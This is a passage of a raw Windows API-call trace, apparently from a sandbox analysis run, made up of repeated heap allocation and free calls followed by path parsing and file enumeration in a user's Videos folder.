RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.153] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.154] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.155] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.155] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.156] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0196.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.156] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.157] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.157] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.158] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.162] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.167] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.171] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.172] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.174] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.174] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.175] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.175] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.176] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.177] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.177] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.178] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.178] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.179] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.179] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.180] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.180] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.181] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.181] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.183] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0196.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0196.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0196.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0196.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0196.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0196.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0196.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.191] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\") returned="FPzctgqI5yS\\" [0196.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0196.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea140 [0196.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.192] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\") returned="Videos\\" [0196.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0196.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea140 | out: hHeap=0x2c0000) returned 1 [0196.192] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0196.192] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0196.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0196.193] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0196.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0196.193] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0196.193] PathFindFileNameW (pszPath="") returned="" [0196.193] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40478 [0196.193] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\FPzctgqI5yS\\*" (normalized: "c:\\users\\keecfmwgj\\videos\\fpzctgqi5ys\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917ad4b0, ftCreationTime.dwHighDateTime=0x1d89d6a, ftLastAccessTime.dwLowDateTime=0x1967e630, ftLastAccessTime.dwHighDateTime=0x1d8a453, ftLastWriteTime.dwLowDateTime=0x1967e630, ftLastWriteTime.dwHighDateTime=0x1d8a453, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0196.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0196.195] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917ad4b0, ftCreationTime.dwHighDateTime=0x1d89d6a, ftLastAccessTime.dwLowDateTime=0x1967e630, ftLastAccessTime.dwHighDateTime=0x1d8a453, ftLastWriteTime.dwLowDateTime=0x1967e630, ftLastWriteTime.dwHighDateTime=0x1d8a453, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0196.195] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a3147d0, ftCreationTime.dwHighDateTime=0x1d8a1a7, ftLastAccessTime.dwLowDateTime=0x16d24970, ftLastAccessTime.dwHighDateTime=0x1d8a60f, ftLastWriteTime.dwLowDateTime=0x16d24970, ftLastWriteTime.dwHighDateTime=0x1d8a60f, nFileSizeHigh=0x0, nFileSizeLow=0x13c94, dwReserved0=0xa0000003, 